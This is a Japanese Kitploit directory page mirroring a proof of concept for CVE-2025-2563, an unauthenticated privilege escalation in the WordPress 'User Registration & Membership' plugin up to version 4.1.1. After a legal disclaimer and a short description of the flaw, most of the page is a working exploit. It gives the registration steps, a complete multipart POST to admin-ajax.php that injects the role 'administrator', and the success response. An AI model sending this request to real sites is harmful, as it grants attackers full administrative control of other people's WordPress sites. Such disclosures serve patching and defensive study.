Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-2563 — CVE-2025-2563 PoC | Kitploit
ツール/GitHubGitHub/ubaydev/cve-2025-2563
特権昇格脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHububaydev/cve-2025-2563

CVE-2025-2563

CVE-2025-2563 PoC

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-2563

User Registration & Membership <= 4.1.1 - 未認証の権限昇格

免責事項!

このCVE(Common Vulnerabilities and Exposures)に関する記述で提示される情報は、教育目的および情報提供のみを目的としています。提供される詳細は、公開されているリソース、調査、および著者による分析に基づいています。本コンテンツは、ハッキング、悪用、またはシステムへの不正アクセスを含む違法行為を促進または奨励することを意図したものではありません。

著者は、提示された情報の誤用に対して一切の責任を負いません。個人および組織は、この知識を責任を持って、該当する法律や規制に準拠して適用することを推奨します。読者は、適切な許可を得た管理された環境でのみ脆弱性をテストすることを強くお勧めします。

この記事の著者および貢献者は、悪意のある活動を支持または推奨せず、責任ある開示と倫理的なハッキングの実践を奨励します。


説明

「User Registration & Membership」WordPressプラグイン(メンバーシップサイトや登録フォームを作成するための人気ツール)に、重大なセキュリティ脆弱性が発見されました。CVE-2025-2563として識別されるこの欠陥は、CVSSスコア9.8を記録しており、その深刻度の高さを示しています。

WordPress用プラグイン「User Registration & Membership」は、バージョン4.1.1以下において、権限昇格に対して脆弱です。これは、'prepare_members_data()'関数におけるロールタイプの制限が不十分であることに起因します。これにより、認証されていない攻撃者が以下の条件で「administrator」ロールを持つ新しいユーザーアカウントを作成できる可能性があります。

  1. プラグインがメンバーシップアドオンを有効化している
  2. 登録ユーザーが確認を必要としない

PoC(概念実証)

  1. フロントエンドページ(/registration または /membership-registration)から登録します。
  2. 登録後、次のリクエストデータを使用します。
    root@kitploit:~
    POST /wp-admin/admin-ajax.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
    Accept: */*
    Host: hackthebox.test
    Accept-Encoding: gzip, deflate, br
    Connection: keep-alive
    Content-Type: multipart/form-data; boundary=--------------------------189123966817005614765335
    
    ----------------------------189123966817005614765335
    Content-Disposition: form-data; name="action"
    
    user_registration_membership_register_member
    ----------------------------189123966817005614765335
    Content-Disposition: form-data; name="security"
    
    THE_NONCE_HERE
    ----------------------------189123966817005614765335
    Content-Disposition: form-data; name="members_data"
    
    {"membership":"MEMBERSHIP_ID","payment_method":"free","start_date":"2025-3-29","username":"REGISTERED_USERNAME","role":"administrator"}
    ----------------------------189123966817005614765335--
    
  3. レスポンスは次のようになります。
    root@kitploit:~
    {
        "success": true,
        "data": {
            "member_id": 24,
            "transaction_id": "",
            "message": "New member has been successfully created."
        }
    }  
    
  4. これで、登録したアカウントで管理者権限でログインできます。

参照

  1. https://plugins.trac.wordpress.org/browser/user-registration/tags/4.1.2/modules/membership/includes/Admin/Services/MembersService.php?rev=3259656#L106
  2. https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-registration/user-registration-membership-411-unauthenticated-privilege-escalation
  3. https://securityonline.info/wordpress-plugin-cve-2025-2563-scores-9-8-threatens-thousands-of-membership-sites/

謝辞

  • https://saweria.co/ubaii
  • https://buymeacoffee.com/ubaii
  • https://trakteer.id/ubaii
ツールをダウンロード